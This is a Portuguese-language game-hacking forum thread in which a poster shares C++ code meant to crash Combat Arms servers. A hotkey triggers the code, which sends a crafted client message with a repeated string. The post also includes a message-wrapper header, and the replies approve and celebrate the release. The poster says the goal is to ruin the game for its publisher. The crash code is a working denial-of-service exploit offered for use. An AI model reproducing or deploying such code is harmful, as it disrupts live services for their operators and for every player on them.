Page 1 of 3 123 LastLast
Results 1 to 15 of 31
  1. #1
    Gx4hxR's Avatar
    Join Date
    Jan 2012
    Gender
    male
    Location
    MPGH
    Posts
    206
    Reputation
    5
    Thanks
    107
    My Mood
    Angelic

    CA SERVER CRASH BY GX4HXR & F43R





    Image dos arquivos de cabeçalhos

    Mais um codigos pra vocês

    Na base CPP coloca isso
    Code:
    void CBase::DoServerCrash(int Value)
    {
        if (Value ==0)
            return;
    
        CAutoMessage Msg;
        Msg.Writeuint8(104);
        if(GetAsyncKeyState(0x4C) & 1){
        Msg.WriteWString((wchar_t*) L"Come get some come get some come get some come get some ");
        }
        g_LTClient->SendToServer(Msg.Read(), MESSAGE_GUARANTEED);
    }
    Algumas classes
    Code:
    //////////////////////////////////////////////////////////////////////////////
    // Automatic message handling utility class
    
    #ifndef __AUTOMESSAGE_H__
    #define __AUTOMESSAGE_H__
    
    #include "LTClient.h"
    #include "iltmessage.h"
    
    class ILTMessage_Write;
    class ILTMessage_Read;
    
    extern CCommonLT* g_CommonLT; // Defined in CommonUtilities.h
    
    // Wrapper for ILTMessage_Write for making it easier to send messages
    // It will be allocated from g_pCommonLT in the ctor, and will be released in the dtor
    class CAutoMessage
    {
    public:
        // Constructors
        CAutoMessage() : m_pMsg(NULL)
        {
            Init();
        }
        ~CAutoMessage()
        {
            Term();
        }
        CAutoMessage(const ILTMessage_Read &cMsg) : m_pMsg(NULL)
        {
            Init();
            CLTMsgRef_Read cReadMsg(cMsg.Clone());
            WriteMessage(cReadMsg);
        }
        // Useful constructors for writing out one element of data
        // Be careful to make sure that the type is the one you expect
        CAutoMessage(const char *pStr) : m_pMsg(NULL)
        {
            Init();
            WriteString(pStr);
        }
        CAutoMessage(const wchar_t *pStr) : m_pMsg(NULL)
        {
            Init();
            WriteWString(pStr);
        }
        template <class T>
        CAutoMessage(const T &tValue) : m_pMsg(NULL)
        {
            Init();
            WriteType(tValue);
        }
    
        
        // Call this function to let go of the current message and make a new one
        // (e.g. when using the same CAutoMessage variable for multiple message calls.)
        void Reset() { Init(); }
        bool IsValid() { return m_pMsg != NULL ; }
    
        // Casting operators to get back to ILTMessage_Write
        inline operator ILTMessage_Write*() { return m_pMsg; }
        inline operator const ILTMessage_Write*() const { return m_pMsg; }
        inline operator ILTMessage_Write&() { return *m_pMsg; }
        inline operator const ILTMessage_Write&() const { return *m_pMsg; }
    
        // Wrappers for the rest of ILTMessage_Write's functions
        inline CLTMsgRef_Read Read() { return CLTMsgRef_Read(m_pMsg->Read()); }
        inline uint32 Size() const { return m_pMsg->Size(); }
        inline void WriteBits(uint32 nValue, uint32 nSize) { m_pMsg->WriteBits(nValue, nSize); }
        inline void WriteBits64(uint64 nValue, uint32 nSize) { m_pMsg->WriteBits64(nValue, nSize); }
        inline void WriteData(const void *pData, uint32 nSize) { m_pMsg->WriteData(pData, nSize); }
        inline void WriteMessage(ILTMessage_Read *pMsg) { m_pMsg->WriteMessage(pMsg); }
        inline void WriteMessageRaw(ILTMessage_Read *pMsg) { m_pMsg->WriteMessageRaw(pMsg); }
        inline void WriteString(const char *pString) { m_pMsg->WriteString(pString); }
        inline void WriteWString(const wchar_t *pString) { m_pMsg->WriteWString(pString); }
        inline void WriteCompLTVector(const LTVector &vVec) { m_pMsg->WriteCompLTVector(vVec); }
        inline void WriteCompPos(const LTVector &vPos) { m_pMsg->WriteCompPos(vPos); }
        inline void WriteCompLTRotation(const LTRotation &cRotation) { m_pMsg->WriteCompLTRotation(cRotation); }
        inline void WriteObject(HOBJECT hObj) { m_pMsg->WriteObject(hObj); }
        inline void WriteYRotation(const LTRotation &cRotation) { m_pMsg->WriteYRotation(cRotation); }
        inline void WriteDatabaseRecord( IDatabaseMgr *pDatabase, HRECORD hRecord ) { m_pMsg->WriteDatabaseRecord( pDatabase, hRecord ); }
        inline void Writebool(bool bValue) { WriteBits(bValue ? 1 : 0, 1); }
        inline void Writeuint8(uint8 nValue) { WriteBits(nValue, 8); }
        inline void Writeuint16(uint16 nValue) { WriteBits(nValue, 16); }
        inline void Writeuint32(uint32 nValue) { WriteBits(nValue, 32); }
        inline void Writeuint64(uint64 nValue) { WriteBits64(nValue, 64); }
        inline void Writeint8(int8 nValue) { WriteBits((uint32)nValue, 8); }
        inline void Writeint16(int16 nValue) { WriteBits((uint32)nValue, 16); }
        inline void Writeint32(int32 nValue) { WriteBits((uint32)nValue, 32); }
        inline void Writeint64(int32 nValue) { WriteBits64((uint64)nValue, 32); }
        inline void Writefloat(float fValue) { WriteBits(reinterpret_cast<const uint32&>(fValue), 32); }
        inline void Writedouble(double fValue) { WriteBits64(reinterpret_cast<const uint64&>(fValue), 64); }
        inline void WriteLTVector(const LTVector &vValue) { WriteType(vValue); }
        inline void WriteLTRotation(const LTRotation &cValue) { WriteType(cValue); }
        inline void WriteLTRigidTransform(const LTRigidTransform &tfValue) { WriteType( tfValue ); }
        inline void WriteLTTransform(const LTTransform &tfValue) { WriteType( tfValue ); }
        inline void WriteLTPolarCoord(const LTPolarCoord &polarCoord) { m_pMsg->WriteLTPolarCoord( polarCoord ); }
        inline void WriteCompLTPolarCoord(const LTPolarCoord &polarCoord) { m_pMsg->WriteCompLTPolarCoord( polarCoord ); }
        template <class T>
        inline void WriteType(const T &tValue) { m_pMsg->WriteType(tValue); }
    private:
        inline void Init()
        {
            Term();
            m_pMsg = NULL;
            ILTMessage_Write *pMsg;
            LTRESULT nResult = g_CommonLT->CreateMessage(pMsg);
            if (nResult == LT_OK)
                m_pMsg = pMsg;
            ASSERT(nResult == LT_OK);
        }
        inline void Term()
        {
            m_pMsg = NULL;
        }
        CLTMsgRef_Write m_pMsg;
    };
    
    #endif //__AUTOMESSAGE_H__
    Precisa definir o MESSAGE_GUARANTEED, isso eu posto amanha

    Creditos:
    Gx4hxR
    F43R - Quase tudo dele -


    Aviso pode dar erros tenque organizar os arquivos dos cabeçalhos em ordem espero que isso possa ajudar.

    SCAN
    GX4HXR & F4AR.rar - Verificador de malware do Jotti
    <b>Downloadable Files</b> Downloadable Files
    Last edited by BACKD00R; 01-13-2012 at 06:09 PM.
    List of disrespect
    MrLionBR

    CoderBlack09
    BR ta perdido mesmo...

  2. The Following 22 Users Say Thank You to Gx4hxR For This Useful Post:

    'Douglas (04-28-2012),'SmoLL (07-12-2012),AmericanZone (03-26-2014),cr0wley (07-22-2012),diegosarria12 (12-04-2012),edi472 (07-12-2012),fusionmate (07-16-2012),GoldWhite (01-28-2013),iMelo~* (08-19-2012),ImTehReaper (07-15-2012),iNational (12-16-2017),InBriza- (08-29-2012),isaiasr (01-13-2012),killstreak (07-03-2012),King Of Death (04-27-2012),kredon (01-24-2014),Megaloco (07-17-2013),MegaPixxx (04-06-2013),Otaviomorais (08-26-2012),pugialli99 (07-28-2015),RullezJr (05-13-2013),stayron (12-01-2012)

  3. #2
    BACKD00R's Avatar
    Join Date
    Jan 2010
    Gender
    male
    Location
    Brazil
    Posts
    10,711
    Reputation
    1814
    Thanks
    31,902
    My Mood
    Aggressive
    Aprovado! Esse deu trabalho hein!
    Last edited by BACKD00R; 01-13-2012 at 05:58 PM.



     

    Skype : BACKD00R-MPGH

     

    • Contributor: October, 31th 2011
    • CA BR Minion: January, 03th 2012
    • CF AL Minion: April, 07th 2012
    • CA Minion: April, 15th 2012
    • CF Minion: July, 03th 2012
    • PB Minion: January, 25th 2013
    • AVA Minion : February, 02th 2013
    • Arctic Combat minion: April, 03th 2013
    • Warface Minion: April, 03th 2013

    • Minion + : July 08th 2012
    • Moderator : January 21th 2013
    • Global Moderator : August 1st 2013







  4. #3
    Dave84311's Avatar
    Join Date
    Dec 2005
    Gender
    male
    Location
    The Wild Wild West
    Posts
    35,837
    Reputation
    5782
    Thanks
    41,292
    My Mood
    Devilish
    RIP CABR ahahahah





    THE EYE OF AN ADMINISTRATOR IS UPON YOU. ANY WRONG YOU DO IM GONNA SEE, WHEN YOU'RE ON MPGH, LOOK BEHIND YOU, 'CAUSE THATS WHERE IM GONNA BE


    "First they ignore you. Then they laugh at you. Then they fight you. Then you lose.” - Dave84311

    HAVING VIRTUAL DETOX

  5. The Following User Says Thank You to Dave84311 For This Useful Post:

    killstreak (07-03-2012)

  6. #4
    Gx4hxR's Avatar
    Join Date
    Jan 2012
    Gender
    male
    Location
    MPGH
    Posts
    206
    Reputation
    5
    Thanks
    107
    My Mood
    Angelic
    hahahaha credits F43R and anyone guy of *********
    List of disrespect
    MrLionBR

    CoderBlack09
    BR ta perdido mesmo...

  7. #5
    FR1GHT's Avatar
    Join Date
    Dec 2011
    Gender
    male
    Location
    Comendo Peru Pato Frango Burguer e Bebendo Whisky
    Posts
    1,633
    Reputation
    68
    Thanks
    987
    My Mood
    Yeehaw
    Esse cara podia mt bem fazer um vip com oq ele posto



  8. #6
    Gx4hxR's Avatar
    Join Date
    Jan 2012
    Gender
    male
    Location
    MPGH
    Posts
    206
    Reputation
    5
    Thanks
    107
    My Mood
    Angelic
    tem mais um monte pra postar hehe, e vou postar atualizações tambem hehehe
    List of disrespect
    MrLionBR

    CoderBlack09
    BR ta perdido mesmo...

  9. #7
    BACKD00R's Avatar
    Join Date
    Jan 2010
    Gender
    male
    Location
    Brazil
    Posts
    10,711
    Reputation
    1814
    Thanks
    31,902
    My Mood
    Aggressive
    Quote Originally Posted by Dave84311 View Post
    RIP CABR ahahahah
    This is nothing yet!



     

    Skype : BACKD00R-MPGH

     

    • Contributor: October, 31th 2011
    • CA BR Minion: January, 03th 2012
    • CF AL Minion: April, 07th 2012
    • CA Minion: April, 15th 2012
    • CF Minion: July, 03th 2012
    • PB Minion: January, 25th 2013
    • AVA Minion : February, 02th 2013
    • Arctic Combat minion: April, 03th 2013
    • Warface Minion: April, 03th 2013

    • Minion + : July 08th 2012
    • Moderator : January 21th 2013
    • Global Moderator : August 1st 2013







  10. #8
    Gx4hxR's Avatar
    Join Date
    Jan 2012
    Gender
    male
    Location
    MPGH
    Posts
    206
    Reputation
    5
    Thanks
    107
    My Mood
    Angelic
    kkkkkkkkkkkkkkkkk acho q vou postar life taker hehe
    List of disrespect
    MrLionBR

    CoderBlack09
    BR ta perdido mesmo...

  11. #9
    FR1GHT's Avatar
    Join Date
    Dec 2011
    Gender
    male
    Location
    Comendo Peru Pato Frango Burguer e Bebendo Whisky
    Posts
    1,633
    Reputation
    68
    Thanks
    987
    My Mood
    Yeehaw
    Quote Originally Posted by Gx4hxR View Post
    kkkkkkkkkkkkkkkkk acho q vou postar life taker hehe
    Posta kero antecipa meu vipão

    ---------- Post added at 10:57 PM ---------- Previous post was at 10:56 PM ----------

    Quote Originally Posted by Gx4hxR View Post
    tem mais um monte pra postar hehe, e vou postar atualizações tambem hehehe
    N sei pq mas to começando a gosta de ti



  12. #10
    Sr_Especialista's Avatar
    Join Date
    Aug 2011
    Gender
    male
    Posts
    101
    Reputation
    10
    Thanks
    53
    vlw manouss deu a loka em vc e nois ganha '-'
    Last edited by Sr_Especialista; 01-13-2012 at 08:52 PM.

  13. #11
    MKQzPTK's Avatar
    Join Date
    Jan 2012
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    Cara sou novato nisso , mais o que isso faz ?
    Como colocar ele ?
    Pode postar um tutorial ?

  14. #12
    Gx4hxR's Avatar
    Join Date
    Jan 2012
    Gender
    male
    Location
    MPGH
    Posts
    206
    Reputation
    5
    Thanks
    107
    My Mood
    Angelic
    Quote Originally Posted by Sr_Especialista View Post
    vlw manouss deu a loka em vc e nois ganha '-'
    N deu a louca em mim não, é pra estragar esse jogo lixo que a LUG ganha dinheiro
    List of disrespect
    MrLionBR

    CoderBlack09
    BR ta perdido mesmo...

  15. #13
    Templar's Avatar
    Join Date
    Jan 2011
    Gender
    male
    Location
    Brazil
    Posts
    3,217
    Reputation
    87
    Thanks
    989
    My Mood
    Angelic
    Ai caralho, eu tenho a porra dessa base.
    ...
    FFFFFFFFFUUUUUUUUUUUUUUUUUUUUUU
    Just a wanderer from the beginnings of this site.
    An old Combat Arms' sections active member and hacker (just what I thought when I was a child).

    My IM doesn't work. Send me a private message instead.

    Name changes:
    bruno2204
    The Rev.
    BioHuman
    Element™

  16. #14
    ChaosMagician's Avatar
    Join Date
    Dec 2010
    Gender
    male
    Posts
    1,669
    Reputation
    20
    Thanks
    1,326
    My Mood
    Dead
    ótimo, agora crianças da WC vao se dar 100% de créditos pelo super lifetaker delas, e os verdadeiros coders de vip, os que realmente manjam Neo I.I.I Zeas, e etc vao sair prejudicados com isso.

  17. The Following User Says Thank You to ChaosMagician For This Useful Post:

    baraozin (01-14-2012)

  18. #15
    baraozin's Avatar
    Join Date
    Feb 2011
    Gender
    male
    Posts
    975
    Reputation
    82
    Thanks
    802
    My Mood
    Amused
    Ae lecherzao fdp

    FER = QUEM POSTO ESSA MERDA NO G O R D O N
    KILL MITICO!


    RESPECT LIST


    1° WE11INGTON
    2° Eminem
    3° Moki
    4°Mahsartor
    5° G.
    6° Batata




    METAS


    Legenda:

    Tenho esperança

    Consegui

    Ta quase (+ ou -)

    Ta Longe...

    Editar uma base (CA) [ ]
    CRIAR um cheater[]

    Ser programador basico VB.NET []
    Saber o basico C++[ ]

    Saber intermediario VB.NET []

    Saber intermediario C++ []

    Ser programador avançado VB.NET []

    Ser programador avançado C++ []

    Ter um emprego relacionado a tudo isso acima [] (ainda nao tenho e claro mas quando tiver...)

Page 1 of 3 123 LastLast

Similar Threads

  1. New Server Crash VIP Hack
    By Ian in forum Combat Arms Discussions
    Replies: 43
    Last Post: 11-08-2009, 06:43 PM
  2. Private Server - Crash Bot 2000
    By AeroMan in forum General Game Hacking
    Replies: 0
    Last Post: 05-19-2009, 10:13 AM
  3. Server Crashed and Other Related News
    By Dave84311 in forum News & Announcements
    Replies: 10
    Last Post: 10-24-2008, 05:28 PM
  4. [Glitch]Cause server crash
    By crazyfool in forum Combat Arms Hacks & Cheats
    Replies: 19
    Last Post: 10-12-2008, 08:27 PM
  5. server crashing
    By Rajinn in forum Combat Arms Hacks & Cheats
    Replies: 17
    Last Post: 08-06-2008, 01:11 PM